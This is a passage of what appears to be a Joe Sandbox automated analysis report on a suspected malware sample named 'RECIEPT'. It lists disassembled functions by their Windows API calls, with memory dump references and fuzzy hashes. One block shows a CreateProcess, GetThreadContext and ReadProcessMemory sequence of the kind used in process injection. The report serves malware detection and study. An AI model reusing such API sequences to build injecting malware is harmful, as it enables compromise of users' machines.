                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                        • String ID:
                                        • API String ID: 2999321469-0
                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03F08ADB
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F08B71
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F08B93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                        • Instruction ID: 5e6250ee51ea60b2d2c172ab279aaf821ff6c0c1fe0229ec1113affe260d192b
                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                        • Instruction Fuzzy Hash: 8C12DC24E24658C6EB24DF64D8507DEB232EF68340F1090E9D10DEB7A5E77A4E81CB5A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                        • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                        • Instruction ID: ba1a180a354307970ca5324e735c4d43e275f35ec71acda5bde6c4d397417e15
                                        • Opcode Fuzzy Hash: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                        • Instruction Fuzzy Hash: 4811A572A00614ABCB10EFB9C98585BB7E9EF44354710862AFC18E7741E635FD50CBD5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __lock_file
                                        • String ID:
                                        • API String ID: 3031932315-0
                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • _memmove.LIBCMT ref: 00428939
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                        • String ID:
                                        • API String ID: 620504543-0
                                        • Opcode ID: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                                        • Instruction ID: c2064c2796ab03ff69418e3c62d92c7a192424b86f475a5c46dd96dfc8171558
                                        • Opcode Fuzzy Hash: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                                        • Instruction Fuzzy Hash: 27011DB46005509FDB00DF5DD891F5677A1AF8A308F14819DE2098F366DA36E846CB92
                                        APIs
                                          • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                          • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                          • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                        • VariantClear.OLEAUT32(?), ref: 0047973E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$CopyInit
                                        • String ID:
                                        • API String ID: 24293632-0
                                        • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                        • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                        • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                        • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 03F09331
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: 03cff337f99740e3da1e84147ef0536eb94322fb164cbfc5ba0b74240d0de8d3
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: C7E0E67494110DDFDB00EFB8D5496DE7FB4EF04301F1001A1FD01D2281D7709D509A62
                                        APIs
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                        • SendMessageW.USER32 ref: 0047CA7F
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                        • ImageList_SetDragCursorImage.COMCTL32(009651C8,00000000,00000000,00000000), ref: 0047CB9B
                                        • ImageList_BeginDrag.COMCTL32(009651C8,00000000,000000F8,000000F0), ref: 0047CBAC
                                        • SetCapture.USER32(?), ref: 0047CBB6
                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                        • SendMessageW.USER32 ref: 0047CD12
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                        • SendMessageW.USER32 ref: 0047CD80
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                        • SendMessageW.USER32 ref: 0047CE93
                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02E21B80,00000000,?,?,?,?), ref: 0047CF1C
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                        • SendMessageW.USER32 ref: 0047CF6B
                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02E21B80,00000000,?,?,?,?), ref: 0047CFE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3100379633-4164748364
                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00434420
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                        • IsIconic.USER32(?), ref: 0043444F
                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 2889586943-2988720461
                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                        APIs
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                        • _wcslen.LIBCMT ref: 00446498
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • _wcsncpy.LIBCMT ref: 004464C0
                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                        • CloseDesktop.USER32(?), ref: 0044657A
                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                        • String ID: $@OH$default$winsta0
                                        • API String ID: 3324942560-3791954436
                                        • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                        • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                        • __swprintf.LIBCMT ref: 004789D3
                                        • __swprintf.LIBCMT ref: 00478A1D
                                        • __swprintf.LIBCMT ref: 00478A4B
                                        • __swprintf.LIBCMT ref: 00478A79
                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                        • __swprintf.LIBCMT ref: 00478AA7
                                        • __swprintf.LIBCMT ref: 00478AD5
                                        • __swprintf.LIBCMT ref: 00478B03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
